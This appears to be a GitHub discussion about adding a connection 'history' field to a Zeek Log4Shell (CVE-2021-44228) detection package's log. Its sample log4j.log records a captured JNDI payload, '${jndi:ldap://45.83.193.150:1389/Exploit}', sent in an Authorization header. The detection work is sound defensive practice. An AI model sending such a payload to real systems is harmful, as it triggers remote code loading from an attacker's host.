cve-2021-44228
cve-2021-44228 copied to clipboard
corelight
Add history field to the notice and/or log4j
Would it be possible to add the history field to the log4j or notice log? This can be useful when threat hunting and be able to rule out an attempt had it been reset or if it timedout for example. Currently a customer would have to pivot on the UID to the conn log and pull the information.
So I went ahead and added this to see what it would look like. Notice that the history value at the time the log4j log entry is created are different. I don't know much about the history field, but I suspect it might not be useful if it isn't "complete". I'm guessing the uid union approach with conn is The Right Way™ to do this, but let me know if the incomplete history is still useful.
~/code/cve-2021-44228 add-history*
¡ cat log4j.log
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path log4j
#open 2021-12-16-17-19-05
#fields ts uid http_uri uri stem target_host target_port method is_orig name value matched_name matched_value history
#types time string string string string string string string bool string string bool bool string
1639350256.733555 CEX3Ta1xTltBcGU5rg / 45.83.193.150:1389/Exploit 45.83.193.150:1389 45.83.193.150 1389 GET T AUTHORIZATION Bearer ${jndi:ldap://45.83.193.150:1389/Exploit} F T ShAD
#close 2021-12-16-17-19-05
~/code/cve-2021-44228 add-history*
¡ cat conn.log
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path conn
#open 2021-12-16-17-19-05
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration orig_bytes resp_bytes conn_state local_orig local_resp missed_bytes history orig_pkts orig_ip_bytes resp_pkts resp_ip_bytes tunnel_parents
#types time string addr port addr port enum string interval count count string bool bool count string count count count count set[string]
1639350256.509078 CEX3Ta1xTltBcGU5rg 154.65.28.250 57932 172.16.4.58 80 tcp http 0.224914 142 802 SF - - 0 ShADFadfR 6 438 4 1018 -
#close 2021-12-16-17-19-05
